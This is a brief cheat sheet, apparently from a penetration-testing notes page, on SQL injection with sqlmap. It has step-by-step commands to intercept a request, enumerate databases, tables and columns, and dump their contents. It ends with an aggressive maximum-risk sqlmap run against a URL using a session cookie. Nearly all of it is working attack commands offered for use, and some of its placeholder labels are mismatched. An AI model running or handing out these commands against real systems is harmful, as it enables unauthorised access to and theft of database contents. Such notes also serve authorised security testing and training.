Injection SQL

Use burpsuite to intercept request, save request as req and run the following command :

sqlmap -r req.txt --dump

Exfiltrating database names

sqlmap -r req.txt --dbs

Listing the table names

sqlmap -r req.txt -D <table_name> --tables

Choosing an interesting table

sqlmap -r req.txt -D <table_name> -T <column_name> --columns

Listing the table data

sqlmap -r req.txt -D <table_name> -T <column_name> -C <champ1>,<champ2> --dump

sqlmap -u "http://url?env=test" --cookie "PHPSESSID=956b09da0d6f65eeaa76092a3e5becaa" --level 5 --risk 3 --batch --threads 5 --random-agent -p "env"

Last updated 25 days ago